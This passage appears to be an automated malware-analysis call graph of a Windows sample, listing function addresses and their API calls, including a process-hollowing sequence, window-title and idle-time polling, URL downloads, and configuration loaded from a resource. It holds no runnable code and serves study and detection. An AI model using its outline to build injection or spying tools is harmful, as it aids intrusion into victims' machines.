401f13 54210->54283 54215 40dbae 54211->54215 54212 40db00 54217 40417e 28 API calls 54212->54217 54213 40daae 54218 40417e 28 API calls 54213->54218 54216 40417e 28 API calls 54215->54216 54219 40dbbd 54216->54219 54220 40db0e 54217->54220 54221 40dabc 54218->54221 54267 40ddd1 54219->54267 54226 40417e 28 API calls 54220->54226 54227 40417e 28 API calls 54221->54227 54223 401f09 11 API calls 54223->54206 54229 40db24 54226->54229 54230 40dad2 54227->54230 54232 402fa5 28 API calls 54229->54232 54233 402fa5 28 API calls 54230->54233 54231 402fa5 28 API calls 54234 40dbe5 54231->54234 54235 40db2f 54232->54235 54236 40dadd 54233->54236 54237 401f09 11 API calls 54234->54237 54238 401f13 28 API calls 54235->54238 54239 401f13 28 API calls 54236->54239 54240 40dbef 54237->54240 54241 40db3a 54238->54241 54242 40dae8 54239->54242 54243 401f09 11 API calls 54240->54243 54244 401f09 11 API calls 54241->54244 54245 401f09 11 API calls 54242->54245 54246 40dbf8 54243->54246 54247 40db43 54244->54247 54248 40daf1 54245->54248 54249 401f09 11 API calls 54246->54249 54250 401f09 11 API calls 54247->54250 54251 401f09 11 API calls 54248->54251 54252 40dc01 54249->54252 54253 40da83 54250->54253 54251->54253 54254 401f09 11 API calls 54252->54254 54253->54223 54255 40dc0a 54254->54255 54256 401f09 11 API calls 54255->54256 54257 40dc13 54256->54257 54257->53744 54258->53756 54321 4180ef 54259->54321 54262->53742 54264 401f8e 54263->54264 54265 402252 11 API calls 54264->54265 54266 401f99 54265->54266 54266->54203 54266->54204 54266->54206 54268 40ddd9 54267->54268 54269 402252 11 API calls 54268->54269 54270 40dde4 54269->54270 54271 4041d9 28 API calls 54270->54271 54272 40dbd0 54271->54272 54273 402fa5 54272->54273 54279 402fb4 54273->54279 54274 402ff6 54303 40323f 54274->54303 54276 402ff4 54296 403262 54276->54296 54279->54274 54280 402feb 54279->54280 54302 403211 28 API calls 54280->54302 54282->54210 54284 401f22 54283->54284 54285 401f6a 54283->54285 54286 402252 11 API calls 54284->54286 54285->54253 54287 401f2b 54286->54287 54288 401f6d 54287->54288 54290 401f46 54287->54290 54289 402336 11 API calls 54288->54289 54289->54285 54320 40305c 28 API calls 54290->54320 54293 41bfc4 GetCurrentProcess IsWow64Process 54292->54293 54294 40daaa 54292->54294 54293->54294 54295 41bfdb 54293->54295 54294->54212 54294->54213 54295->54294 54297 40326e 54296->54297 54298 402252 11 API calls 54297->54298 54299 403288 54298->54299 54306 402336 54299->54306 54302->54276 54310 4036a6 54303->54310 54305 40324c 54305->54276 54307 402347 54306->54307 54308 402252 11 API calls 54307->54308 54309 4023c7 54308->54309 54309->54231 54311 402888 22 API calls 54310->54311 54312 4036b9 54311->54312 54313 40372c 54312->54313 54314 4036de 54312->54314 54319 4028a4 22 API calls 54313->54319 54317 4027e6 28 API calls 54314->54317 54318 4036f0 54314->54318 54317->54318 54318->54305 54320->54285 54322 41811c 8 API calls 54321->54322 54323 418189 ___scrt_get_show_window_mode 54322->54323 54335 418328 CloseHandle CloseHandle 54322->54335 54324 4181ef CreateProcessW 54323->54324 54323->54335 54325 418225 VirtualAlloc GetThreadContext 54324->54325 54326 41847a GetLastError 54324->54326 54327 418253 ReadProcessMemory 54325->54327 54328 418444 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 54325->54328 54326->54335 54327->54328 54329 418279 NtCreateSection 54327->54329 54328->54335 54329->54328 54330 4182a1 54329->54330 54331 4182c1 NtMapViewOfSection 54330->54331 54332 4182b0 NtUnmapViewOfSection 54330->54332 54333 4182e5 VirtualFree NtClose TerminateProcess 54331->54333 54334 41832d GetCurrentProcess NtMapViewOfSection 54331->54334 54332->54331 54333->54322 54333->54335 54334->54328 54339 41835a ctype 54334->54339 54335->53745 54336 4183da 54337 4183f6 WriteProcessMemory 54336->54337 54338 418419 SetThreadContext 54336->54338 54337->54328 54340 418415 54337->54340 54338->54328 54341 418432 ResumeThread 54338->54341 54339->54336 54340->54338 54341->54328 54342 418440 54341->54342 54342->54335 54343->53768 54345 4020f6 28 API calls 54344->54345 54346 415b0c SetEvent 54345->54346 54347 415b21 54346->54347 54348 4041a2 28 API calls 54347->54348 54349 415b3b 54348->54349 54350 4020f6 28 API calls 54349->54350 54351 415b4b 54350->54351 54352 4020f6 28 API calls 54351->54352 54353 415b5d 54352->54353 54354 41be1b 28 API calls 54353->54354 54355 415b66 54354->54355 54356 415cd6 54355->54356 54358 415b86 GetTickCount 54355->54358 54418 415ce5 54355->54418 54357 401e8d 11 API calls 54356->54357 54359 417092 54357->54359 54361 41bb8e 28 API calls 54358->54361 54363 401fd8 11 API calls 54359->54363 54360 415cf9 54452 4050e4 84 API calls 54360->54452 54364 415b97 54361->54364 54367 41709e 54363->54367 54423 41bae6 GetLastInputInfo GetTickCount 54364->54423 54366 415cc9 54366->54356 54369 401fd8 11 API calls 54367->54369 54368 415ba3 54370 41bb8e 28 API calls 54368->54370 54371 4170aa 54369->54371 54372 415bae 54370->54372 54424 41ba96 54372->54424 54375 41bd1e 28 API calls 54376 415bca 54375->54376 54377 401e65 22 API calls 54376->54377 54378 415bd8 54377->54378 54379 402f31 28 API calls 54378->54379 54380 415be6 54379->54380 54429 402ea1 28 API calls 54380->54429 54382 415bf5 54383 402f10 28 API calls 54382->54383 54384 415c04 54383->54384 54430 402ea1 28 API calls 54384->54430 54386 415c13 54387 402f10 28 API calls 54386->54387 54388 415c1f 54387->54388 54431 402ea1 28 API calls 54388->54431 54390 415c29 54391 404aa1 61 API calls 54390->54391 54392 415c38 54391->54392 54393 401fd8 11 API calls 54392->54393 54394 415c41 54393->54394 54395 401fd8 11 API calls 54394->54395 54396 415c4d 54395->54396 54397 401fd8 11 API calls 54396->54397 54398 415c59 54397->54398 54399 401fd8 11 API calls 54398->54399 54400 415c65 54399->54400 54401 401fd8 11 API calls 54400->54401 54402 415c71 54401->54402 54403 401fd8 11 API calls 54402->54403 54404 415c7d 54403->54404 54405 401f09 11 API calls 54404->54405 54406 415c86 54405->54406 54407 401fd8 11 API calls 54406->54407 54408 415c8f 54407->54408 54409 401fd8 11 API calls 54408->54409 54410 415c98 54409->54410 54411 401e65 22 API calls 54410->54411 54412 415ca3 54411->54412 54432 43baac 54412->54432 54415 415cb5 54419 415cc3 54415->54419 54420 415cce 54415->54420 54416 415cdb 54417 401e65 22 API calls 54416->54417 54417->54418 54418->54356 54418->54360 54436 404ff4 82 API calls 54419->54436 54437 404f51 54420->54437 54423->54368 54453 436e90 54424->54453 54427 40417e 28 API calls 54428 415bbc 54427->54428 54428->54375 54429->54382 54430->54386 54431->54390 54433 43bac5 _strftime 54432->54433 54455 43ae03 54433->54455 54435 415cb0 54435->54415 54435->54416 54436->54366 54438 404f65 54437->54438 54439 404fea 54437->54439 54440 404f6e 54438->54440 54441 404fc0 CreateEventA CreateThread 54438->54441 54442 404f7d GetLocalTime 54438->54442 54439->54356 54440->54441 54441->54439 54526 405150 54441->54526 54443 41bb8e 28 API calls 54442->54443 54444 404f91 54443->54444 54525 4052fd 28 API calls 54444->54525 54452->54366 54454 41bab5 GetForegroundWindow GetWindowTextW 54453->54454 54454->54427 54471 43ba0a 54455->54471 54457 43ae50 54477 43a7b7 54457->54477 54458 43ae15 54458->54457 54459 43ae2a 54458->54459 54470 43ae2f pre_c_initialization 54458->54470 54476 4405dd 20 API calls __dosmaperr 54459->54476 54463 43ae5c 54464 43ae8b 54463->54464 54485 43ba4f 40 API calls __Toupper 54463->54485 54467 43aef7 54464->54467 54486 43b9b6 20 API calls 2 library calls 54464->54486 54487 43b9b6 20 API calls 2 library calls 54467->54487 54468 43afbe _strftime 54468->54470 54488 4405dd 20 API calls __dosmaperr 54468->54488 54470->54435 54472 43ba22 54471->54472 54473 43ba0f 54471->54473 54472->54458 54489 4405dd 20 API calls __dosmaperr 54473->54489 54475 43ba14 pre_c_initialization 54475->54458 54476->54470 54478 43a7d4 54477->54478 54479 43a7ca 54477->54479 54478->54479 54490 448215 GetLastError 54478->54490 54479->54463 54481 43a7f5 54511 448364 36 API calls __Toupper 54481->54511 54483 43a80e 54512 448391 36 API calls __fassign 54483->54512 54485->54463 54486->54467 54487->54468 54488->54470 54489->54475 54491 448237 54490->54491 54492 44822b 54490->54492 54514 445af3 20 API calls 3 library calls 54491->54514 54513 4487bc 11 API calls 2 library calls 54492->54513 54495 448231 54495->54491 54497 448280 SetLastError 54495->54497 54496 448243 54498 44824b 54496->54498 54521 448812 11 API calls 2 library calls 54496->54521 54497->54481 54515 446782 54498->54515 54501 448260 54501->54498 54503 448267 54501->54503 54502 448251 54505 44828c SetLastError 54502->54505 54522 448087 20 API calls __dosmaperr 54503->54522 54523 4460f4 36 API calls 4 library calls 54505->54523 54506 448272 54508 446782 _free 20 API calls 54506->54508 54510 448279 54508->54510 54509 448298 54510->54497 54510->54505 54511->54483 54512->54479 54513->54495 54514->54496 54516 44678d HeapFree 54515->54516 54520 4467b6 _free 54515->54520 54517 4467a2 54516->54517 54516->54520 54524 4405dd 20 API calls __dosmaperr 54517->54524 54519 4467a8 GetLastError 54519->54520 54520->54502 54521->54501 54522->54506 54523->54509 54524->54519 54529 40515c 102 API calls 54526->54529 54528 405159 54529->54528 54530->53640 54531->53645 54532->53647 54533 445847 54535 445852 54533->54535 54536 44587b 54535->54536 54537 445877 54535->54537 54539 448a84 54535->54539 54546 44589f DeleteCriticalSection 54536->54546 54547 4484ca 54539->54547 54542 448ac9 InitializeCriticalSectionAndSpinCount 54543 448ab4 54542->54543 54554 434fcb 54543->54554 54545 448ae0 54545->54535 54546->54537 54548 4484fa 54547->54548 54551 4484f6 54547->54551 54548->54542 54548->54543 54549 44851a 54549->54548 54552 448526 GetProcAddress 54549->54552 54551->54548 54551->54549 54561 448566 54551->54561 54553 448536 __crt_fast_encode_pointer 54552->54553 54553->54548 54555 434fd6 IsProcessorFeaturePresent 54554->54555 54556 434fd4 54554->54556 54558 435018 54555->54558 54556->54545 54568 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54558->54568 54560 4350fb 54560->54545 54562 448587 LoadLibraryExW 54561->54562 54563 44857c 54561->54563 54564 4485a4 GetLastError 54562->54564 54567 4485bc 54562->54567 54563->54551 54565 4485af LoadLibraryExW 54564->54565 54564->54567 54565->54567 54566 4485d3 FreeLibrary 54566->54563 54567->54563 54567->54566 54568->54560 54569 434887 54570 434893 CallCatchBlock 54569->54570 54596 434596 54570->54596 54572 43489a 54574 4348c3 54572->54574 54902 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54572->54902 54579 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54574->54579 54607 444251 54574->54607 54578 4348e2 CallCatchBlock 54585 434962 54579->54585 54903 4433e7 36 API calls 5 library calls 54579->54903 54615 434b14 54585->54615 54597 43459f 54596->54597 54908 434c52 IsProcessorFeaturePresent 54597->54908 54599 4345ab 54909 438f31 54599->54909 54601 4345b0 54606 4345b4 54601->54606 54918 4440bf 54601->54918 54604 4345cb 54604->54572 54606->54572 54608 444268 54607->54608 54609 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 54608->54609 54610 4348dc 54609->54610 54610->54578 54611 4441f5 54610->54611 54612 444224 54611->54612 54613 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 54612->54613 54614 44424d 54613->54614 54614->54579 54616 436e90 ___scrt_get_show_window_mode 54615->54616 54617 434b27 GetStartupInfoW 54616->54617 54618 434968 54617->54618 54619 4441a2 54618->54619 54968 44f059 54619->54968 54621 434971 54624 40e9c5 54621->54624 54622 4441ab 54622->54621 54972 446815 36 API calls 54622->54972 55102 41cb50 LoadLibraryA GetProcAddress 54624->55102 54626 40e9e1 GetModuleFileNameW 55107 40f3c3 54626->55107 54628 40e9fd 54629 4020f6 28 API calls 54628->54629 54630 40ea0c 54629->54630 54631 4020f6 28 API calls 54630->54631 54632 40ea1b 54631->54632 54633 41be1b 28 API calls 54632->54633 54634 40ea24 54633->54634 55122 40fb17 54634->55122 54636 40ea2d 54637 401e8d 11 API calls 54636->54637 54638 40ea36 54637->54638 54639 40ea93 54638->54639 54640 40ea49 54638->54640 54641 401e65 22 API calls 54639->54641 55308 40fbb3 118 API calls 54640->55308 54643 40eaa3 54641->54643 54647 401e65 22 API calls 54643->54647 54644 40ea5b 54645 401e65 22 API calls 54644->54645 54646 40ea67 54645->54646 55309 410f37 36 API calls __EH_prolog 54646->55309 54648 40eac2 54647->54648 54650 40531e 28 API calls 54648->54650 54652 40ead1 54650->54652 54651 40ea79 55310 40fb64 78 API calls 54651->55310 54653 406383 28 API calls 54652->54653 54655 40eadd 54653->54655 54657 401fe2 28 API calls 54655->54657 54656 40ea82 55311 40f3b0 71 API calls 54656->55311 54659 40eae9 54657->54659 54660 401fd8 11 API calls 54659->54660 54661 40eaf2 54660->54661 54663 401fd8 11 API calls 54661->54663 54665 40eafb 54663->54665 54666 401e65 22 API calls 54665->54666 54667 40eb04 54666->54667 54668 401fc0 28 API calls 54667->54668 54669 40eb0f 54668->54669 54670 401e65 22 API calls 54669->54670 54671 40eb28 54670->54671 54672 401e65 22 API calls 54671->54672 54673 40eb43 54672->54673 54674 40ebae 54673->54674 55312 406c1e 54673->55312 54675 401e65 22 API calls 54674->54675 54681 40ebbb 54675->54681 54677 40eb70 54678 401fe2 28 API calls 54677->54678 54679 40eb7c 54678->54679 54682 401fd8 11 API calls 54679->54682 54680 40ec02 55126 40d069 54680->55126 54681->54680 54687 413549 3 API calls 54681->54687 54684 40eb85 54682->54684 55317 413549 RegOpenKeyExA 54684->55317 54693 40ebe6 54687->54693 54691 40f34f 55352 4139a9 30 API calls 54691->55352 54693->54680 55320 4139a9 30 API calls 54693->55320 54701 40f365 55353 412475 65 API calls ___scrt_get_show_window_mode 54701->55353 54902->54572 54903->54585 54908->54599 54910 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54909->54910 54922 43a43a 54910->54922 54913 438f44 54913->54601 54915 438f4c 54916 438f57 54915->54916 54936 43a476 DeleteCriticalSection 54915->54936 54916->54601 54964 44fb68 54918->54964 54921 438f5a 8 API calls 3 library calls 54921->54606 54923 43a443 54922->54923 54925 43a46c 54923->54925 54926 438f40 54923->54926 54937 438e7f 54923->54937 54942 43a476 DeleteCriticalSection 54925->54942 54926->54913 54928 43a3ec 54926->54928 54957 438d94 54928->54957 54930 43a3f6 54931 43a401 54930->54931 54962 438e42 6 API calls try_get_function 54930->54962 54931->54915 54933 43a40f 54934 43a41c 54933->54934 54963 43a41f 6 API calls ___vcrt_FlsFree 54933->54963 54934->54915 54936->54913 54943 438c73 54937->54943 54940 438eb6 InitializeCriticalSectionAndSpinCount 54941 438ea2 54940->54941 54941->54923 54942->54926 54944 438ca3 54943->54944 54945 438ca7 54943->54945 54944->54945 54949 438cc7 54944->54949 54950 438d13 54944->54950 54945->54940 54945->54941 54947 438cd3 GetProcAddress 54948 438ce3 __crt_fast_encode_pointer 54947->54948 54948->54945 54949->54945 54949->54947 54951 438d3b LoadLibraryExW 54950->54951 54956 438d30 54950->54956 54952 438d57 GetLastError 54951->54952 54953 438d6f 54951->54953 54952->54953 54954 438d62 LoadLibraryExW 54952->54954 54955 438d86 FreeLibrary 54953->54955 54953->54956 54954->54953 54955->54956 54956->54944 54958 438c73 try_get_function 5 API calls 54957->54958 54959 438dae 54958->54959 54960 438dc6 TlsAlloc 54959->54960 54961 438db7 54959->54961 54961->54930 54962->54933 54963->54931 54965 44fb81 54964->54965 54966 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 54965->54966 54967 4345bd 54966->54967 54967->54604 54967->54921 54969 44f062 54968->54969 54971 44f06b 54968->54971 54973 44ef58 54969->54973 54971->54622 54972->54622 54974 448215 __Toupper 36 API calls 54973->54974 54975 44ef65 54974->54975 54993 44f077 54975->54993 54977 44ef6d 55002 44ecec 54977->55002 54980 44ef84 54980->54971 54985 446782 _free 20 API calls 54985->54980 54986 44efc2 55026 4405dd 20 API calls __dosmaperr 54986->55026 54987 44efdf 54989 44f00b 54987->54989 54990 446782 _free 20 API calls 54987->54990 54992 44efc7 54989->54992 55027 44ebc2 20 API calls 54989->55027 54990->54989 54992->54985 54994 44f083 CallCatchBlock 54993->54994 54995 448215 __Toupper 36 API calls 54994->54995 55000 44f08d 54995->55000 54997 44f111 CallCatchBlock 54997->54977 55000->54997 55001 446782 _free 20 API calls 55000->55001 55028 4460f4 36 API calls 4 library calls 55000->55028 55029 445888 EnterCriticalSection 55000->55029 55030 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 55000->55030 55001->55000 55003 43a7b7 __fassign 36 API calls 55002->55003 55004 44ecfe 55003->55004 55005 44ed0d GetOEMCP 55004->55005 55006 44ed1f 55004->55006 55007 44ed36 55005->55007 55006->55007 55008 44ed24 GetACP 55006->55008 55007->54980 55009 446137 55007->55009 55008->55007 55010 446175 55009->55010 55014 446145 ___crtLCMapStringA 55009->55014 55032 4405dd 20 API calls __dosmaperr 55010->55032 55012 446160 RtlAllocateHeap 55013 446173 55012->55013 55012->55014 55013->54992 55016 44f119 55013->55016 55014->55010 55014->55012 55031 442f80 7 API calls 2 library calls 55014->55031 55017 44ecec 38 API calls 55016->55017 55018 44f138 55017->55018 55020 44f189 IsValidCodePage 55018->55020 55023 44f13f 55018->55023 55025 44f1ae ___scrt_get_show_window_mode 55018->55025 55019 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 55021 44efba 55019->55021 55022 44f19b GetCPInfo 55020->55022 55020->55023 55021->54986 55021->54987 55022->55023 55022->55025 55023->55019 55033 44edc4 GetCPInfo 55025->55033 55026->54992 55027->54992 55028->55000 55029->55000 55030->55000 55031->55014 55032->55013 55034 44edfe 55033->55034 55042 44eea8 55033->55042 55043 45112c 55034->55043 55037 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 55039 44ef54 55037->55039 55039->55023 55041 44ae66 _swprintf 41 API calls 55041->55042 55042->55037 55044 43a7b7 __fassign 36 API calls 55043->55044 55045 45114c MultiByteToWideChar 55044->55045 55047 451222 55045->55047 55048 45118a 55045->55048 55049 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 55047->55049 55050 446137 ___crtLCMapStringA 21 API calls 55048->55050 55054 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 55048->55054 55051 44ee5f 55049->55051 55050->55054 55057 44ae66 55051->55057 55052 45121c 55062 435e40 20 API calls _free 55052->55062 55054->55052 55055 4511f0 MultiByteToWideChar 55054->55055 55055->55052 55056 45120c GetStringTypeW 55055->55056 55056->55052 55058 43a7b7 __fassign 36 API calls 55057->55058 55059 44ae79 55058->55059 55063 44ac49 55059->55063 55062->55047 55064 44ac64 ___crtLCMapStringA 55063->55064 55065 44ac8a MultiByteToWideChar 55064->55065 55066 44acb4 55065->55066 55077 44ae3e 55065->55077 55069 446137 ___crtLCMapStringA 21 API calls 55066->55069 55073 44acd5 __alloca_probe_16 55066->55073 55067 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 55068 44ae51 55067->55068 55068->55041 55069->55073 55070 44ad1e MultiByteToWideChar 55071 44ad37 55070->55071 55072 44ad8a 55070->55072 55090 448bb3 55071->55090 55099 435e40 20 API calls _free 55072->55099 55073->55070 55073->55072 55077->55067 55078 44ad61 55078->55072 55080 448bb3 _strftime 11 API calls 55078->55080 55079 44ad99 55082 446137 ___crtLCMapStringA 21 API calls 55079->55082 55085 44adba __alloca_probe_16 55079->55085 55080->55072 55081 44ae2f 55098 435e40 20 API calls _free 55081->55098 55082->55085 55083 448bb3 _strftime 11 API calls 55086 44ae0e 55083->55086 55085->55081 55085->55083 55086->55081 55087 44ae1d WideCharToMultiByte 55086->55087 55087->55081 55088 44ae5d 55087->55088 55100 435e40 20 API calls _free 55088->55100 55091 4484ca __dosmaperr 5 API calls 55090->55091 55092 448bda 55091->55092 55094 448be3 55092->55094 55101 448c3b 10 API calls 3 library calls 55092->55101 55096 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 55094->55096 55095 448c23 LCMapStringW 55095->55094 55097 448c35 55096->55097 55097->55072 55097->55078 55097->55079 55098->55072 55099->55077 55100->55072 55101->55095 55103 41cb8f LoadLibraryA GetProcAddress 55102->55103 55104 41cb7f GetModuleHandleA GetProcAddress 55102->55104 55105 41cbb8 44 API calls 55103->55105 55106 41cba8 LoadLibraryA GetProcAddress 55103->55106 55104->55103 55105->54626 55106->55105 55354 41b4a8 FindResourceA 55107->55354 55110 43bd51 new 21 API calls 55111 40f3ed ctype 55110->55111 55112 4020b7 28 API calls 55111->55112 55113 40f408 55112->55113 55114 401fe2 28 API calls 55113->55114 55115 40f413 55114->55115 55116 401fd8 11 API calls 55115->55116 55117 40f41c 55116->55117 55118 43bd51 new 21 API calls 55117->55118 55119 40f42d ctype 55118->55119 55357 406dd8 55119->55357 55121 40f460 55121->54628 55123 40fb23 55122->55123 55125 40fb2a 55122->55125 55360 402163 11 API calls 55123->55360 55125->54636 55361 401fab 55126->55361 55308->54644 55309->54651 55310->54656 55313 4020df 11 API calls 55312->55313 55314 406c2a 55313->55314 55315 4032a0 28 API calls 55314->55315 55316 406c47 55315->55316 55316->54677 55318 40eba4 55317->55318 55319 413573 RegQueryValueExA RegCloseKey 55317->55319 55318->54674 55318->54691 55319->55318 55320->54680 55352->54701 55355 41b4c5 LoadResource LockResource SizeofResource 55354->55355 55356 40f3de 55354->55356 55355->55356 55356->55110 55358 4020b7 28 API calls 55357->55358 55359 406dec 55358->55359 55359->55121 55360->55125 55801 4269e6 55802 4269fb 55801->55802 55808 426a8d 55801->55808 55803 426a48 55802->55803 55804 426b44 55802->55804 55805 426abd 55802->55805 55806 426b1d 55802->55806 55802->55808 55812 426af2 55802->55812 55814 426a7d 55802->55814 55829 424edd 55802->55829 55803->55808 55803->55814 55837 41fb6c 52 API calls 55803->55837 55804->55808 55840 426155 28 API calls 55804->55840 55805->55808 55805->55812 55838 41fb6c 52 API calls 55805->55838 55806->55804 55806->55808 55817 425ae1 55806->55817 55812->55806 55839 4256f0 21 API calls 55812->55839 55814->55805 55814->55808 55816 424edd 49 API calls 55814->55816 55816->55805 55818 425b00 ___scrt_get_show_window_mode 55817->55818 55820 425b0f 55818->55820 55824 425b34 55818->55824 55841 41ebbb 21 API calls 55818->55841 55820->55824 55828 425b14 55820->55828 55842 4205d8 46 API calls 55820->55842 55823 425b1d 55823->55824 55849 424d05 21 API calls 2 library calls 55823->55849 55824->55804 55826 425bb7 55826->55824 55843 432ec4 55826->55843 55828->55823 55828->55824 55848 41da5f 49 API calls 55828->55848 55830 424ef6 55829->55830 55836 424eeb ctype 55829->55836 55850 423878 55830->55850 55832 424f1b 55832->55836 55864 41ebbb 21 API calls 55832->55864 55834 424f41 55834->55836 55865 433556 CryptAcquireContextA CryptGenRandom CryptReleaseContext 55834->55865 55836->55803 55837->55803 55838->55805 55839->55806 55840->55808 55841->55820 55842->55826 55844 432ed2 55843->55844 55845 432ece 55843->55845 55846 43bd51 new 21 API calls 55844->55846 55845->55828 55847 432ed7 55846->55847 55847->55828 55848->55823 55849->55824 55851 42388d 55850->55851 55855 4238b7 55850->55855 55851->55855 55866 423792 55851->55866 55852 42390a 55863 423983 55852->55863 55885 422834 21 API calls 55852->55885 55855->55852 55855->55863 55884 42224d 21 API calls 55855->55884 55857 423920 55857->55863 55886 422509 21 API calls 55857->55886 55859 423945 55861 423961 55859->55861 55859->55863 55887 42290e 21 API calls 55859->55887 55861->55863 55888 4232bc 49 API calls 55861->55888 55863->55832 55864->55834 55865->55836 55867 4237a5 55866->55867 55868 4237ea 55866->55868 55871 4221da 21 API calls 55867->55871 55883 4237e3 55867->55883 55889 4221da 55868->55889 55870 4237f5 55872 4221da 21 API calls 55870->55872 55870->55883 55871->55867 55873 423808 55872->55873 55874 4221da 21 API calls 55873->55874 55873->55883 55875 423818 55874->55875 55876 4221da 21 API calls 55875->55876 55875->55883 55877 423828 55876->55877 55878 4221da 21 API calls 55877->55878 55877->55883 55879 423838 55878->55879 55880 4221da 21 API calls 55879->55880 55879->55883 55881 423848 55880->55881 55882 4221da 21 API calls 55881->55882 55881->55883 55882->55883 55883->55855 55884->55852 55885->55857 55886->55859 55887->55861 55888->55863 55890 4221f3 55889->55890 55897 4221ec 55889->55897 55891 422237 55890->55891 55892 422204 55890->55892 55900 421fa0 21 API calls 55891->55900 55898 421f2a 21 API calls 55892->55898 55895 42220c 55895->55897 55899 421e6c 21 API calls 55895->55899 55897->55870 55898->55895 55899->55897 55900->55897 55901 415d06 55916 41b380 55901->55916 55903 415d0f 55904 4020f6 28 API calls 55903->55904 55905 415d1e 55904->55905 55906 404aa1 61 API calls 55905->55906 55907 415d2a 55906->55907 55908 417089 55907->55908 55909 401fd8 11 API calls 55907->55909 55910 401e8d 11 API calls 55908->55910 55909->55908 55911 417092 55910->55911 55912 401fd8 11 API calls 55911->55912 55913 41709e 55912->55913 55914 401fd8 11 API calls 55913->55914 55915 4170aa 55914->55915 55917 4020df 11 API calls 55916->55917 55918 41b38e 55917->55918 55919 43bd51 new 21 API calls 55918->55919 55920 41b39e InternetOpenW InternetOpenUrlW 55919->55920 55921 41b3c5 InternetReadFile 55920->55921 55924 41b3e8 55921->55924 55922 4020b7 28 API calls 55922->55924 55923 41b415 InternetCloseHandle InternetCloseHandle 55925 41b427 55923->55925 55924->55921 55924->55922 55924->55923 55926 401fd8 11 API calls 55924->55926 55925->55903 55926->55924 55927 1000c7a7 55928 1000c7be 55927->55928 55933 1000c82c 55927->55933 55928->55933 55937 1000c7e6 GetModuleHandleA 55928->55937 55929 1000c872 55930 1000c835 GetModuleHandleA 55932 1000c83f 55930->55932 55932->55932 55932->55933 55933->55929 55933->55930 55938 1000c7ef 55937->55938 55943 1000c82c 55937->55943 55947 1000c803 55938->55947 55940 1000c872 55941 1000c835 GetModuleHandleA 55942 1000c83f 55941->55942 55942->55942 55942->55943 55943->55940 55943->55941 55948 1000c809 55947->55948 55949 1000c82c 55948->55949 55950 1000c80d VirtualProtect 55948->55950 55952 1000c872 55949->55952 55953 1000c835 GetModuleHandleA 55949->55953 55950->55949 55951 1000c81c VirtualProtect 55950->55951 55951->55949 55954 1000c83f 55953->55954 55954->55949 55955 426c4b 55960 426cc8 send 55955->55960 55961 415ef1 55986 408b64 55961->55986 55964 401e65 22 API calls 55965 415f08 55964->55965 55966 4020f6 28 API calls 55965->55966 55967 415f13 55966->55967 55968 401e65 22 API calls 55967->55968 55969 415f1e 55968->55969 55970 4020f6 28 API calls 55969->55970 55971 415f29 55970->55971 55972 401e65 22 API calls 55971->55972 55973 415f34 55972->55973 55974 4020f6 28 API calls 55973->55974 55975 415f3f 55974->55975 55989 406e07 55975->55989 55979 415f57 55980 401e8d 11 API calls 55979->55980 55981 417092 55980->55981 55982 401fd8 11 API calls 55981->55982 55983 41709e 55982->55983 55984 401fd8 11 API calls 55983->55984 55985 4170aa 55984->55985 56019 4046f7 55986->56019 55990 40482d 3 API calls 55989->55990 55991 406e16 55990->55991 55992 4048c8 97 API calls 55991->55992 55993 406e1e 55992->55993 55994 402f31 28 API calls 55993->55994 55995 406e3d 55994->55995 55996 402f10 28 API calls 55995->55996 55997 406e48 55996->55997 55998 402f10 28 API calls 55997->55998 55999 406e53 55998->55999 56000 402f10 28 API calls 55999->56000 56001 406e5d 56000->56001 56002 404aa1 61 API calls 56001->56002 56003 406e6a 56002->56003 56004 401fd8 11 API calls 56003->56004 56005 406e72 56004->56005 56006 401fd8 11 API calls 56005->56006 56007 406e7a 56006->56007 56008 401fd8 11 API calls 56007->56008 56009 406e82 56008->56009 56010 404c10 272 API calls 56009->56010 56011 406e90 56010->56011 56012 401fd8 11 API calls 56011->56012 56013 406e98 56012->56013 56014 401fd8 11 API calls 56013->56014 56015 406ea0 56014->56015 56016 401fd8 11 API calls 56015->56016 56017 406ea8 56016->56017 56018 408b72 99 API calls 56017->56018 56018->55979 56020 4020df 11 API calls 56019->56020 56021 404707 56020->56021 56022 4020df 11 API calls 56021->56022 56023 40471e 56022->56023 56024 404736 56023->56024 56025 40482d 3 API calls 56023->56025 56024->55964 56025->56024 56026 4161b3 56027 401e65 22 API calls 56026->56027 56028 4161be 56027->56028 56029 43baac _strftime 40 API calls 56028->56029 56030 4161cb 56029->56030 56031 401e65 22 API calls 56030->56031 56032 4161d9 56031->56032 56033 4020f6 28 API calls 56032->56033 56034 4161e3 56033->56034 56035 4161fb 56034->56035 56036 41622a 56034->56036 56038 401e65 22 API calls 56035->56038 56037 401e65 22 API calls 56036->56037 56039 41622f 56037->56039 56040 416200 56038->56040 56042 4020f6 28 API calls 56039->56042 56041 4020f6 28 API calls 56040->56041 56043 41620b 56041->56043 56044 41623a 56042->56044 56045 4020f6 28 API calls 56043->56045 56046 4020f6 28 API calls 56044->56046 56047 41621a 56045->56047 56048 416249 56046->56048 56117 41876f 56047->56117 56050 41876f 289 API calls 56048->56050 56051 416226 56050->56051 56052 401e65 22 API calls 56051->56052 56053 416263 56052->56053 56054 43baac _strftime 40 API calls 56053->56054 56055 416270 56054->56055 56056 401e65 22 API calls 56055->56056 56057 416285 56056->56057 56058 43baac _strftime 40 API calls 56057->56058 56059 416292 56058->56059 56070 41893c 56059->56070 56062 417089 56064 401e8d 11 API calls 56062->56064 56063 401fd8 11 API calls 56063->56062 56065 